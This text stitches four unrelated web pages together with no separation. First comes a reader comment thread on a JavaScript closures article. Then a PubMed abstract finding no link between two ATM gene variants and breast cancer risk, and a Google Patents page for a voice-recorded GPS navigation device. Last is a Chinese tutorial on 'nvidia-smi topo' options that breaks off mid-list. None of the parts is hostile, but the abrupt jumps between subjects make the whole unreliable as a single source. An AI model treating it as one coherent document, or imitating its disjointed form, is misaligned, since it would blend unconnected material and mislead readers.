Warburton, 2015/09/09 17:26 Great article. So the function object's reference to its scope is used to construct the scope chain? So in your third image, the [[scope]] pointer is copied to create the left most white-headed arrow? Dmitry Frank, 2015/09/09 17:57 Thank you for your feedback. So the function object's reference to its scope is used to construct the scope chain? Right. So in your third image, the [[scope]] pointer is copied to create the left most white-headed arrow? Yes, we can see it in this way. In UML, the white-headed arrow is used to denote the inheritance, so, that's what I tried to show. So, when the function is called, new scope object is created (the leftmost one on the diagram), and it inherits from the scope object pointed to by function's [[scope]]. Rolograaf , 2015/09/12 20:49 very visually helpful looking forward to follow up article with ES6 let and arrow functions? Dmitry Frank, 2015/09/14 19:53 Rolograaf, thank for the feedback. Sorry for the late reply, I was outdoors for several days. I was already thinking of expanding the article with let from ES6. I hope I'll have some time for it. As to arrow functions, as far as I know, they're just a syntactic sugar (even though an appealing one), so, they don't bring anything new to the “under the hood” picture of scopes. Chad Walker, 2015/09/14 15:01 Hi, I enjoyed the article. I think you should add initial to the createCounter() scopes. I was slightly confused when you had value in the increment scope. I hadn't realized at first that arguments would be in the scope; but of course they would, initial is still accessible to get() and increment() even though it's not used. Dmitry Frank, 2015/09/14 19:45 Hi Chad, I'm glad you enjoyed! And yes, you're right; I've added initial to diagrams. Thanks for pointing this out. Mohamed Hussain S H, 2015/09/15 13:48 Thanks for the clear and nice explanation. Special thanks for including the “This” also in the article. The article clearly explains two most misunderstood concepts this and closures are not related to one other. Dmitry Frank, 2015/09/15 13:53 You're welcome! It's always good to get some positive feedback, thanks! evandrix, 2015/09/16 06:00 It's “clarity”, not “clearness”. Dmitry Frank, 2015/09/16 11:28 Ok, thanks. Noted. I'm wondering whether it is the most critical English mistake I've made (and even not in the article, but in comment) Charlie301, 2015/09/24 18:50 Dude much appreciated for the article. Charlie Dmitry Frank, 2015/09/24 19:12 You're welcome, Charlie! And thanks for your kind feedback. Parambir Singh, 2015/09/28 04:47 Great article. I finally understand how closures work in JavaScript and also what 'this' means. Thanks a lot for your effort :) Dmitry Frank, 2015/09/28 08:17 You're welcome. Glad it helped :) Francis Kim, 2015/10/07 04:54 What an excellent write up. I'll need to revisit to read it again! :) Dmitry Frank, 2015/10/10 07:55 Thanks! Leon LI, 2015/10/10 03:21 This article is super! I thought i totally understand the lexical scope stuff. After reading this, I found I actually had many missing corners. Thanks for sharing. Dmitry Frank, 2015/10/10 07:55 You're welcome, Leon, glad you liked! Duc Nghiem Xuan, 2015/11/25 06:17 Hello, thank you for a very useful article. I've translate it to Vietnamese at https://viblo.asia/xuanduc987/posts/lA7GKnWWMKZQ Dmitry Frank, 2015/11/25 08:35 Hello, thanks, that's great! I updated the list at the top. 李彦峰, 2016/10/07 06:31 Great article!非常棒,感谢博主! Dmitry Frank, 2016/10/07 07:29 Thanks for the comment :) Bhavesh Sharma, 2017/02/08 18:35 Thank you Dmitry, This was a great read. I am however having a difficult time understanding https://www.toptal.com/javascript/10-most-common-javascript-mistakes :Common Mistake #3: Creating memory leaks With this layout, any change you could elaborate? FirebirD, 2017/08/25 13:43 Thank Dmitry. Great article! Dmitry Frank, 2018/01/03 10:32 And thanks for the feedback! Daud, 2018/01/18 05:53 I have created deep nested functions. There are four nested functions function four() is nested → inside function three() nested → inside function two() nested → inside function one(). The Code - function one() { var oneVar = "_oneVar_"; return function two() { var twoVar = "_threeVar_";; return function three() { var threeVar = "_threeVar_"; return function four() { threeVar; twoVar; oneVar; } } } } Run code in Chrome specifically to check Scopes Other browser like Firefox does not show Scopes console.dir(one); console.dir(one()); console.dir(one()()); console.dir(one()()()); So when I run the code and inspect the results in Chrome Developer tools I observed closures in Scopes were not only created for function four but also for function three and function two. It looks as if the local variables that were out of that function scope kept moving out of its functional scope and continued creating closures for each function until it did not found the variable. So what is happening under the hood exactly ? Now I am not sure if this behavior is related JavaScript or is it something to do with The Chrome Dev tools. Excuse for any mistakes Hoping for a reply soon :) Tien Le, 2018/02/08 07:09 Thank you Dmitry, Nice article! Rahul Jain, 2018/08/14 14:59 Such a great article. You made such a misunderstood concept easy to understand. Hats off! Please provide a like button on your page or comments section might get flooded by appreciations only and doubts from people would get unresolved. Dmitry Frank, 2018/08/14 23:09 Thanks for the positive feedback! Sơn Dương, 2020/08/07 14:25 Thank you for your great article. The closures is very hard for me. This article help me to clearly Enter your comment (please, English only). Wiki syntax is allowed: ____ __ __ ___ _ __ __ __ / __ \ / / / / / _ \ / |/ / / //_/ / /_/ // /_/ / / ___/ / / / ,< \____/ \____/ /_/ /_/|_/ /_/|_|   articles/js_closures.txt · Last modified: 2020/04/27 07:48 by dfrank Driven by DokuWiki Recent changes RSS feed Valid CSS Valid XHTML 1.0
Format Send to Choose Destination Breast Cancer Res. 2002;4(6):R15. Epub 2002 Aug 21. No evidence for association of ataxia-telangiectasia mutated gene T2119C and C3161G amino acid substitution variants with risk of breast cancer. Author information 1 Cancer and Cell Biology Division, The Queensland Institute of Medical Research, PO Royal Brisbane Hospital, Queensland, Australia. mandyS@qimr.edu.au Abstract BACKGROUND: There is evidence that certain mutations in the double-strand break repair pathway ataxia-telangiectasia mutated gene act in a dominant-negative manner to increase the risk of breast cancer. There are also some reports to suggest that the amino acid substitution variants T2119C Ser707Pro and C3161G Pro1054Arg may be associated with breast cancer risk. We investigate the breast cancer risk associated with these two nonconservative amino acid substitution variants using a large Australian population-based case-control study. METHODS: The polymorphisms were genotyped in more than 1300 cases and 600 controls using 5' exonuclease assays. Case-control analyses and genotype distributions were compared by logistic regression. RESULTS: The 2119C variant was rare, occurring at frequencies of 1.4 and 1.3% in cases and controls, respectively (P = 0.8). There was no difference in genotype distribution between cases and controls (P = 0.8), and the TC genotype was not associated with increased risk of breast cancer (adjusted odds ratio = 1.08, 95% confidence interval = 0.59-1.97, P = 0.8). Similarly, the 3161G variant was no more common in cases than in controls (2.9% versus 2.2%, P = 0.2), there was no difference in genotype distribution between cases and controls (P = 0.1), and the CG genotype was not associated with an increased risk of breast cancer (adjusted odds ratio = 1.30, 95% confidence interval = 0.85-1.98, P = 0.2). This lack of evidence for an association persisted within groups defined by the family history of breast cancer or by age. CONCLUSION: The 2119C and 3161G amino acid substitution variants are not associated with moderate or high risks of breast cancer in Australian women. PMID: 12473176 PMCID: PMC137935 DOI: 10.1186/bcr534 [Indexed for MEDLINE] Free PMC Article Supplemental Content Full text links Icon for BioMed Central Icon for PubMed Central Loading ... Support Center
Search Images Maps Play YouTube News Gmail Drive More » Sign in Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader. Patents 1. Advanced Patent Search Publication numberUS6282494 B1 Publication typeGrant Application numberUS 09/449,609 Publication dateAug 28, 2001 Filing dateNov 30, 1999 Priority dateNov 30, 1998 Fee statusLapsed Publication number09449609, 449609, US 6282494 B1, US 6282494B1, US-B1-6282494, US6282494 B1, US6282494B1 InventorsJames Hsu Original AssigneeHolux Technology, Inc. Export CitationBiBTeX, EndNote, RefMan External Links: USPTO, USPTO Assignment, Espacenet Customer-settled voice navigation apparatus US 6282494 B1 Abstract A customer-settled voice navigation apparatus is disclosed which comprises a control unit, a satellite positioning signal receiving unit, a map data supply unit, a carte display unit, a navigating condition setting unit, an audio input unit, a navigating condition and information storage unit, a navigating condition comparing unit an audio output unit, and a voice output requiring unit. According to the invention, the user could settle any desired navigating information itself with respect to any location, area, timing, speed, height, and direction by means of an audio-recording manner at any place. Also, the invention could output audio navigating information previously recorded when the navigating condition designated by the user is matched. Images(5) Previous page Next page Claims(10) What is claimed is: 1. A customer-set navigation apparatus comprising a satellite positioning signal receiving unit for receiving a GPS signal; a control unit for controlling and processing the GPS signal received by the satellite positioning signal receiving unit to obtain a real-time condition including coordinate data representative of the place at which the navigation apparatus is located and related data in accordance with the GPS signal; a map data supply unit for supplying to the control unit map data pertinent to the area in which the navigation apparatus is located; a carte display unit for displaying the current location of the satellite positioning signal receiving unit from the map of the map data supply unit in accordance with the coordinate data and the map data; a navigating condition setting unit for setting a navigating condition by a user; an audio input unit for inputting any navigating information corresponding to the navigating condition via voice by the user; a navigating condition comparing unit for determining whether the navigating condition matches the real-time condition; and an audio output unit for outputting corresponding voice navigating information stored in the storage unit according to the navigating condition at the timing the navigating condition matches the real-time condition. 2. The apparatus of claim 1, wherein the navigating condition setting unit includes a condition selecting unit for selecting different conditions being input. 3. The apparatus of claim 1, wherein the navigating condition setting unit includes a location setting unit for inputting coordinate data serving as the navigating condition. 4. The apparatus of claim 1, wherein the navigating condition setting unit includes a time setting unit for inputting time data serving as the navigating condition. 5. The apparatus of claim 1, wherein the navigating condition setting unit includes a speed setting unit for inputting speed data serving as the navigating condition. 6. The apparatus of claim 1, where the navigating condition setting unit includes a height setting unit for inputting height data serving as the navigating condition. 7. The apparatus of claim 1, wherein the navigating condition setting unit includes a direction setting unit for inputting direction data serving as the navigating condition. 8. The apparatus of claim 1, wherein the navigating condition setting unit includes an instant recording unit for immediately inputting audio information. 9. The apparatus of claim 1, wherein the map data supply unit is a card-inserting type. 10. The apparatus of claim 1, further comprising a voice output unit for checking the stored navigating information by a user and actively outputting the stored navigating information via voice. Description BACKGROUND OF THE INVENTION 1. Field of the Invention This invention relates to a customer-settled voice navigation apparatus. More particularly, this invention relates to a customer-settled voice navigation apparatus which incorporates with functions of a global positioning system and a voice-recorder and can be settled by the customer as well as be applied to a car navigation device or a portable navigation device. 2. Description of the Prior Art Upon the opening of radio communication systems and the progression of technique, radio communication has been popularized in light of the large demand. The opening of the global satellite positioning system (GPS) particularly leads to the development of another type of customized product A famous product which has applied the GPS technology is a car navigation device. By means of the car navigation device, a car driver can quickly ascertain where he is and can reach any place he wants via the most direct route which requires the least time. Some of the conventional GPS navigation devices have been provided with a voice navigation function. However, the content of such a voice navigation is determined and set by manufacturer and therefore is incapable of being changed. Furthermore, such content may be not sufficient or suitable for practical use and thus cannot meet the user's requirements. In another type of navigation device, data in a text form can be inputted and then be shown to the user by voice via a so-called text-to-speech conversion technique. However, the content of such a data is also predetermined and set by the manufacturer and thus has the same problems as the fore-stated. More particularly, the sound of the voice may not be acknowledged by the user or may not appeal to the user. SUMMARY OF THE INVENTION The object of this invention is to provide a customer-settled navigation apparatus in which the user can settle any customized map navigation data with voice and the data being set can be outputted in his own voice to any place designated and thereby an effective and practical navigation apparatus is available. To achieve the above object a customer-settled navigation apparatus to according to the present invention comprises a satellite positioning signal receiving unit for receiving a GPS signal; a signal control unit for executing signal control and data processing and obtaining a real-time condition including coordinate data representative of the place where the navigation apparatus is located and its related data in accordance with the GPS signal; a map data supply unit for supply to the control unit map data pertinent to the area in which the navigation apparatus is located; a carte display unit for showing the location of the navigation being imaged in the map in accordance with the coordinate data and the map data; a navigating condition setting unit for setting navigating condition; an audio input unit for inputting any navigating information corresponding to the navigating condition via voice; a navigation information storage unit for storing the voice navigating information; a navigating condition comparing unit for determining whether the navigating condition match the real-time condition; and an audio output unit for outputting corresponding voice navigating information stored in the storage unit according to the-navigating condition at the timing the navigating condition matches the real-time condition, According to the above construction, a user would be able to quickly input any desired navigating information by means of speaking and voice recording at any location and the navigation information will be automatically output to the user with voice. Thus, the user could pay fill attention to what he is doing, such as driving or walling. Moreover, the content of the voice navigation information can be changed at any time. Therefore, a customized, convenient and a customer-settled navigation apparatus is available. In one preferred embodiment, this invention further comprises a navigation condition selection unit used for selecting the kind of the navigation condition to be set so as to input different kinds of navigating conditions. According to the preferred embodiment the user could settle any kind of navigating conditions he desires, such as location, time, speed, height, and direction, etc., according to his actual needs. Thus, the convenience of the navigation apparatus is progressed. In another preferred embodiment, this invention further comprises an instant recording setting unit used to make the navigation apparatus serve as a message recorder so as to immediately perform an instant voice recording without setting a navigation condition. In another further preferred embodiment this invention further comprises a voice output requiring unit for checking the content of the navigation information being settled as well as instantly outputting the message input from a message recorder. In yet another preferred embodiment, the map data supply unit is constructed by a card-inserting structure. Thus, any map of any place as well as any information could be inputted to the navigation apparatus as a background data via cards storing pertinent information. These and other objects, features and advantages of this invention will be apparent from the following more detailed description of the preferred embodiment of his invention as illustrated in the accompanying drawing. BRIEF DESCRIPTION OF THE DRAWINGS FIG. 1 is a block diagram shown the construction of the customer-settled navigation apparatus in accordance with a preferred embodiment of this invention. FIG. 2 is a flow chart depicting the navigating condition setting procedure of the customer settled navigation apparatus shown in FIG. 1. FIG. 3 is a flow chart depicting the navigating information output procedure of the customer-settled navigation apparatus shown in FIG. 1. FIG. 4 is a flow chart depicting the voice output requiring control procedure of the customer-settled navigation apparatus shown in FIG. 1. DETAILED DESCRIPTION OF THE INVENTION As shown in FIG. 1, a customer-settled navigation apparatus in accordance with this invention generally comprises a control unit 1, a satellite positioning signal receiving unit 2, a map data supply unit 3, a display 4 serving as a carte display unit, a navigating condition setting unit 5, a microphone 6 serving as a audio input unit, a navigating information storage unit 7, a navigating condition comparing unit 8, a horn 9 serving as a audio output unit, and a voice output requiring unit 10. In addition, the navigating condition setting unit 5 includes a condition select unit 50, a location setting unit 51, a time setting unit 52, a speed setting unit 53, a height setting unit 54, a direction setting unit 55, and an instant recording setting unit 56. The control unit 1 serves as a control and data process center used to perform any algorithm, analysis, comparison, input output, etc, as well as control other units. The satellite positioning receiving unit 2 is used to receive satellite signals output from at least three satellites in a satellite positioning system (GPS), and send the signals to the control unit 1 so as to be processed for obtaining a real time condition including coordinate data representative of the place in which the navigation apparatus is located and its related data in accordance with the GPS signals. The coordinate data will soon be displayed in the display 4. The map data supply unit 3 is one of card-inserting type in which a map memory card storing information and data pertinent to a particular area can be inserted. Thus, the map data corresponding to the area in which the navigation apparatus located could be supplied to the control unit via the map supply unit 3, and further be displayed in the display incorporating the coordinate data of the navigation apparatus. Moreover, any other type of information can also be input via the map data supply unit 3 in fight of actual application. The display 4 which serves as the carte display unit is used to display the location of the navigation apparatus with respect to its corresponding area in accordance with the supplied map data and the coordinate data derived from the GPS signals. The display 4 can also be of the type capable of receiving signals from a light pen so as to perform the input of the navigating condition. The navigating condition setting unit 5 is used for setting navigating condition. The so-called navigating condition can be a location, a time point, a speed, a height or a direction, etc. Moreover, the navigating condition setting unit 5 can also be set for directly inputting voice without setting the navigation condition, As shown in FIG. 1, the navigating condition setting unit 5 includes a condition select unit 50. Under the condition select unit 50, a location setting mode 51, a time setting mode 52, a speed setting mode 53, a height setting mode 54, a direction setting mode 55, and an instant recording setting mode 56 can be selected. The microphone 6 serving as audio input unit is used for inputting audio navigating information in correspondence with the condition set by the navigating condition setting unit 5. The voice input by the microphone 6 will be digitized and compressed by the control unit 1 and then stored in the navigating information storage unit 7 corresponding to a flag in connection with the navigating condition being set. The navigating information storage unit 7 is a digital memory device such as a violate memory or a non-violate memory, used for storing the navigating conditions being set and the navigation information being inputted. The navigating condition comparing unit 8 is used to compare the navigating condition designated by the navigating condition setting unit 5 with the real-time condition derived from the GPS signals. Along with the reception of the GPS signals, the comparing unit 8 will continuously make such a comparison and determine whether both of the two conditions are matched to each other. For example, for a condition of location, the comparing unit 8 will compare the coordinate data derived from the GPS signals with the coordinate data of the designated location. For a condition of time, the comparing unit 8 will compare the time built in the apparatus or the time derived from the GPS signals with the time designated. For a condition of speed, the comparing unit 8 will compare the designated speed value with a speed value derived from the distance determined by plural GPS signals and the time elapsed under such a distance. The horn 9 is used to output the voice navigating information stored in the storage unit 7. In case a match of condition comparison is obtained in unit 8, a flag indicating such a match will be sent out to the control unit 1 is for actuating the audio output unit 9 to output the voice navigating information corresponding to the navigating condition. The voice navigating information will be decompressed and D/A converted before being output by the horn 9. Therefore, any time the actual condition matches the designated condition, a customer-settled navigation information will be automatically output. The voice output requiring unit 10 is used to actively output the voice information stored in the information storage unit 7 item by item or selectively. By means of this unit an user could check the stored navigating information and its corresponding navigating condition respectively output from the horn 9 and/or the display 4. For example, each navigating information could have a corresponding number and a corresponding condition, and thus the navigating information could be output by selecting an information number, by marking a coordinate on the map or by inputting a condition being designated. More particularly, in case the navigation apparatus is used as a message collect recorder, the message stored could be actively output by this unit or mode. FIG. 2 is a flow chart showing the setting procedure of the customer-settled navigation apparatus disclosed in this invention, After commencing the setting procedure, in step 201, the kind of the condition to be designated is selected. In this embodiment, there are six kinds of conditions that can be selected including location, time, speed, height, direction, and instant recording. When selection in step 201 is completed, the procedure enters step 202. In step 202, navigation condition is designated. In case a condition of location is selected, the coordinate data can be determined by the cursor in case a condition of time is selected, the time data can be input by means of keys. In case a condition of speed is selected, tie speed value data, the speed value can also be input by means of keys. The condition of height and direction is in the same way. In case the instant recording is selected, the setting of the navigation condition will be skipped and enter the next step 203. The navigation condition being designated will be stored into the storage unit 7 by the control unit 1, and being given a indicating flag P1(x). In step 203, navigating information from the user can be input via the microphone 6. In step 204, the navigating information input by the user will be processed by the control unit 1 and then stored into the storage unit 7. In step 205, whether the input of the navigating information ends is determined. For example, a release of a recording key indicates the end of inputting. If no, the flow goes back to step 203 so as to continue receiving voice input. If yes, the flow goes to step 206 in which the control unit 1 will assign a flag P2(x) to the voice information being input. In step 207, whether designations of another conditions will be made is determined. If yes, the flow goes back to step 201 and repeats the follow steps thereof If no, the procedure of setting navigating information ends. FIG. 3 is a flow chart depicting the procedure of automatically outputting the voice navigating information in the customer-settled voice navigation apparatus of this invention. Generally, the receiving of the GPS signals and the display of the location of the navigation apparatus in its related map is not a feature of this invention and thus its descriptions omitted herein. In the following, the description will be directed to how the audio navigation information is outputted with respect to the designated navigating condition in this invention. As shown in FIG. 3, after being started, the navigation apparatus in step 301 will fetch in the received GPS signals and generate a batch of related real-time data or real-time conditions, such as the coordinate of the navigation apparatus, the speed of the navigation apparatus, or the time at the instant. In step 302, the batch of real-time data or conditions are sent to the navigating condition comparing unit 8 so as to be compared to the conditions previously designated in terms of each kind of condition. Once a comparison of one kind of condition is executed, a judgment will be determined in step 303. If a match of such a designated condition is not found, the process passes to step 304 for judging whether another kind of condition shall be compared. If yes, the steps 302, 303, and 304 is repeated. If no, the procedure passes back to step 301 for fetching another batch of real-time data or conditions, However, in step 303 if a match of a designated condition is found, the procedure passes to step 305. In step 305, the control unit 1 will search the corresponding navigation information via its corresponding flag P2(x) in accordance with the corresponding flag P1(x) of the designated condition being matched. In step 306 then the control unit 1 enables the audio output unit 9 to output the corresponding navigation information, i.e., the voice information previously inputted with respect to the designated navigation condition. After step 306, the procedure of automatically outputting voice navigation information will go back to step 304 for judging whether another kind of condition will be compared and repeat its following steps. In other words, after one voice navigation information is output, the output procedure will wait for a next output when another designated condition is found. However, the steps 305 and 306 can also be executed by another subroutine by the triggering of a flag resulted at a timing a match of a designated navigating condition is found in step 303. Thus, the comparison of the designated condition to the real-time condition would be accomplished more quickly. FIG. 4 is a flow chart depicting the procedure of the voice navigation apparatus of this invention under a voice output requiring mode. After starting, a judgment for whether a voice information will be immediately output is determined in step 401. If yes, it means that the navigation apparatus will be requested to output the information being recorded at it serving as a message collecting recorder, and the process passes to step 402. In step 402, one of the voice informations which has no corresponding navigating condition, i.e., any one voice information which has no corresponding flag P1(x), is provided for selection in the form of serial number. The step 406 then outputs the selected voice information in light of its corresponding flag which corresponds to the serial number being selected, In step 408, a judgment for whether another voice information will be requested is determined. If yes, the procedure goes back to step 401. If no, his procedure will be ended and than go back to main routine. On other hand, if the answer in step 401 is no, the procedure passes to step 403. It means that the user wishes to check the voice navigating information having been inputted. In step 403, one navigating condition is requested to be inputted and then step 404 is continued. In step 404, the comparing unit 8 will compare the requested condition to the previously designated conditions so as to search its corresponding navigating information. In step 405, a determination about whether a corresponding navigating condition is found is executed. If yes, the procedure passes to step 406 so as to output corresponding navigating information by means of its corresponding flag and then performs its following steps as mentioned above. If no, step 407 is continued and a warning that no one corresponding navigating condition is found is displayed. It means that such a requested condition as well as its corresponding navigating information is not set. After step 407, step 408 is continued and performs the same operation as mentioned above. In view of the above construction, a customer-settled voice navigation apparatus which incorporates with CPS receiving device, GPS navigation device, instant recording device, audio information setting device, and voice informing device is available. According to that apparatus, the user could settle any desired navigating information itself with respect to any location, areas timing, speeds height, and direction by means of an audio-recording manner at any place. Also, that apparatus could output audio navigating information previously recorded when the navigating condition designated by the user is matched. Moreover, the map data could be either a dot-matrix type of map data or a vector type of map data. However, while the preferred embodiment of customer-settled navigation apparatus disclosed by this invention have been illustrated and described, it should be understood that variations will be apparent to those skilled in the art. Accordingly, this invention is not to be limited to the specific embodiments illustrated and described, and the true scope and spirit of this invention are to be determined by reference to the following claims. Patent Citations Cited PatentFiling datePublication dateApplicantTitle US5177685 *Aug 9, 1990Jan 5, 1993Massachusetts Institute Of TechnologyAutomobile navigation system using real time spoken driving instructions US5736941 *Aug 4, 1995Apr 7, 1998U.S. Philips CorporationNavigation device for a land vehicle with means for generating a multi-element anticipatory speech message, and a vehicle comprising such device US5774071 *Nov 28, 1995Jun 30, 1998Honda Giken Kogyo Kabushiki KaishaOn-board vehicle navigation apparatus US5835881 *Jan 16, 1996Nov 10, 1998Philips Electronics North America CorporationPortable system for providing voice driving directions US5850618 *Dec 28, 1995Dec 15, 1998Aisin Aw Co., Ltd.Navigation device US6085148 *Oct 22, 1997Jul 4, 2000Jamison; Scott R.Automated touring information systems and methods US6104980 *Feb 20, 1998Aug 15, 2000Denso CorporationVehicular operation processing system Referenced by Citing PatentFiling datePublication dateApplicantTitle US6516283 *Jun 11, 2002Feb 4, 2003American Gnc Corp.Core inertial measurement unit US8145381 *Jun 22, 2006Mar 27, 2012Lg Electronics Inc.Transmitting data of a telematics terminal US8165881Aug 29, 2008Apr 24, 2012Honda Motor Co., Ltd.System and method for variable text-to-speech with minimized distraction to operator of an automotive vehicle US8209119Jun 26, 2009Jun 26, 2012Htc CorporationRoute reporting method, system and recording medium using the same US20060064239 *Sep 16, 2005Mar 23, 2006Denso CorporationNavigation device US20070011391 *Jun 22, 2006Jan 11, 2007Lg Electronics Inc.Transmitting data of a telematics terminal US20090083035 *Sep 25, 2007Mar 26, 2009Ritchie Winson HuangText pre-processing for text-to-speech generation US20090234565 *Feb 19, 2007Sep 17, 2009Pieter Andreas GeelenNavigation Device and Method for Receiving and Playing Sound Samples US20100057464 *Mar 4, 2010David Michael KirschSystem and method for variable text-to-speech with minimized distraction to operator of an automotive vehicle US20100057465 *Mar 4, 2010David Michael KirschVariable text-to-speech for automotive application US20100274471 *Oct 28, 2010Htc CorporationRoute reporting method, system and recording medium using the same DE10231544A1 *Jul 11, 2002Jan 29, 2004Karl-Heinz WendischVehicle navigation system which generates information based on the distance between the current location of the system and a location specified by the user Classifications U.S. Classification701/443, 340/995.16, 340/990, 701/454 International ClassificationG01C21/36 Cooperative ClassificationG01C21/3632 European ClassificationG01C21/36G2 Legal Events DateCodeEventDescription Jan 28, 2000ASAssignment May 31, 2000ASAssignment Jan 20, 2005FPAYFee payment Year of fee payment: 4 Mar 9, 2009REMIMaintenance fee reminder mailed Aug 28, 2009LAPSLapse for failure to pay maintenance fees Oct 20, 2009FPExpired due to failure to pay maintenance fee Effective date: 20090828
当前位置:首页> AI教程> NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 释放双眼,带上耳机,听听看~! 本文详细介绍了NVIDIA-SMI命令中拓扑信息选项的各种参数及其使用方法,包括展示系统的GPUDirect通信矩阵和其他相关功能。适合对GPU设备和系统拓扑结构感兴趣的读者阅读。 我正在参加「掘金·启航计划」 拓扑信息(TOPOLOGY) 本文为NVIDIA-SMI系列命令详解第十四篇-拓扑信息,介绍和演示了nvidia-smi 命令的拓扑信息选项topo及其附加参数,命令如下: nvidia-smi topo 该命令用于展示设备或者系统的拓扑结构。 拓扑信息选项,支持的参数列表如下: [-m | --matrix]: 展示系统的 GPUDirect 通信矩阵 [-mp | --matrix_pci]: 展示系统的 GPUDirect 通信矩阵(仅包含pci链接) [-i | --id]: 驱动程序返回的自然枚举中 GPU 的从 0 开始的索引、 GPU 的板序列号、GPU 的 UUID 或 GPU 的 PCI 总线 ID。 如果需要指定多个设备,可以使用逗号","将不同的id隔开。 必须和 -n 、-p 参数联合使用。 [-c | --cpu]: 展示与特定 CPU 亲和的 GPU 设备列表。 [-n | --nearest_gpus]: 展示对于给定遍历路径最近的 GPU 列表,支持的路径列表如下: 0 = 双GPU板上的单个PCIe交换机(例如Tesla K80) 1 = 单个PCIe交换机 2 = 多个PCIe交换机 3 = 单个PCIe主机桥 4 = PCIe 主机桥之间的 CPU 上互连链路 5 = NUMA 节点之间的 SMP 互连链路 必须与 -i 参数联合使用,且只能指定单个设备ID。 [-p | --gpu_path]: 展示一对GPU设备之间的最直接路径遍历,与 -i 一起使用,它必须是一对设备 ID。 [-p2p | --p2pstatus]: 显示给定 p2p 能力的 GPU 之间的 p2p 状态 r - p2p 读能力 w - p2p 写能力 n - p2p nvlink能力 a - p2p 原子能力 p - p2p 仅当所有 gpus 都支持 p2p 时才设置 p2p 属性 [-h | --help]: 展示帮助信息 各参数详解 -m 展示系统的 GPUDirect 通信矩阵 展示系统的 GPUDirect 通信矩阵 运行示例 查看系统的 GPUDirect 通信矩阵 nvidia-smi topo -m NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) GPU0 GPU1 GPU2 GPU3 GPU4 GPU5 GPU6 GPU7 mlx5_1 mlx5_2 mlx5_3 mlx5_4 CPU Affinity NUMA Affinity GPU0 X NV12 NV12 NV12 NV12 NV12 NV12 NV12 PIX NODE SYS SYS 0-55 0 GPU1 NV12 X NV12 NV12 NV12 NV12 NV12 NV12 PIX NODE SYS SYS 0-55 0 GPU2 NV12 NV12 X NV12 NV12 NV12 NV12 NV12 NODE PIX SYS SYS 0-55 0 GPU3 NV12 NV12 NV12 X NV12 NV12 NV12 NV12 NODE PIX SYS SYS 0-55 0 GPU4 NV12 NV12 NV12 NV12 X NV12 NV12 NV12 SYS SYS PIX NODE 56-111 1 GPU5 NV12 NV12 NV12 NV12 NV12 X NV12 NV12 SYS SYS PIX NODE 56-111 1 GPU6 NV12 NV12 NV12 NV12 NV12 NV12 X NV12 SYS SYS NODE PIX 56-111 1 GPU7 NV12 NV12 NV12 NV12 NV12 NV12 NV12 X SYS SYS NODE PIX 56-111 1 mlx5_1 PIX PIX NODE NODE SYS SYS SYS SYS X NODE SYS SYS mlx5_2 NODE NODE PIX PIX SYS SYS SYS SYS NODE X SYS SYS mlx5_3 SYS SYS SYS SYS PIX PIX NODE NODE SYS SYS X NODE mlx5_4 SYS SYS SYS SYS NODE NODE PIX PIX SYS SYS NODE X Legend: X = Self SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI) NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU) PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge) PIX = Connection traversing at most a single PCIe bridge NV# = Connection traversing a bonded set of # NVLinks • X: 自身 • SYS:通过 PCIe 的连接以及 NUMA 节点之间的 SMP 互连(例如,QPI/UPI) • NODE:通过 PCIe 的连接以及 NUMA 节点内 PCIe 主机桥之间的互连 • PHB:通过 PCIe 和 PCIe 主机桥(通常是 CPU)的连接 • PXB:通过多个 PCIe 桥互连(不跨 PCIe 主机桥) • PIX:通过最多一个 PCIe 桥互连 • NV# :通过数量为n组的 NVLinks 互连 -mp 展示系统的 GPUDirect 通信矩阵(仅PCI连接) 展示系统的 GPUDirect 通信矩阵(仅PCI连接) 运行示例 查看系统的 GPUDirect 通信矩阵(仅PCI连接) nvidia-smi topo -mp NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) GPU0 GPU1 GPU2 GPU3 GPU4 GPU5 GPU6 GPU7 CPU Affinity NUMA Affinity GPU0 X PHB PHB PHB PHB PHB PHB PHB 0-127 0-1 GPU1 PHB X PHB PHB PHB PHB PHB PHB 0-127 0-1 GPU2 PHB PHB X PHB PHB PHB PHB PHB 0-127 0-1 GPU3 PHB PHB PHB X PHB PHB PHB PHB 0-127 0-1 GPU4 PHB PHB PHB PHB X PHB PHB PHB 0-127 0-1 GPU5 PHB PHB PHB PHB PHB X PHB PHB 0-127 0-1 GPU6 PHB PHB PHB PHB PHB PHB X PHB 0-127 0-1 GPU7 PHB PHB PHB PHB PHB PHB PHB X 0-127 0-1 Legend: X = Self SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI) NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU) PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge) PIX = Connection traversing at most a single PCIe bridge -i 指定GPU id是驱动程序返回的自然枚举中 GPU 的从 0 开始的索引、GPU 的板序列号、GPU 的 UUID 或 GPU 的 PCI 总线 ID。 如果需要指定多个设备,可以使用逗号”,”将不同的id隔开。必须与 -n 或者 -p 配合使用 运行示例 查看设备id为4和7的GPU之间的最直接路径遍历 nvidia-smi topo -i 4,7 -p NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到4和7之间最直接的遍历路径是PCIe主机桥接 -c 展示与特定 CPU 亲和的 GPU 设备列表 展示与特定 CPU 亲和的 GPU 设备列表 运行示例 查看与CPU 2、111亲和的GPU设备列表 nvidia-smi topo -c 2 nvidia-smi topo -c 111 NVIDIA-SMI系列命令详解:拓扑信息(TOPOLOGY) 可以看到 与CPU 2 亲和的GPU设备列表为0、1、2、3 与CPU 2 亲和的GPU设备列表为4、5、6、7 -n 展示对于给定遍历路径最近的 GPU 列表 展示对于给定遍历路径最近的 GPU 列表,支持的路径列表如下: • 0 = 双GPU板上的单个PCIe交换机(例如Tesla K80) • 1 = 单个PCIe交换机 • 2 = 多个PCIe交换机 • 3 = 单个PCIe主机桥 • 4 = PCIe 主机桥之间的 CPU 上互连链路 • 5 = NUMA 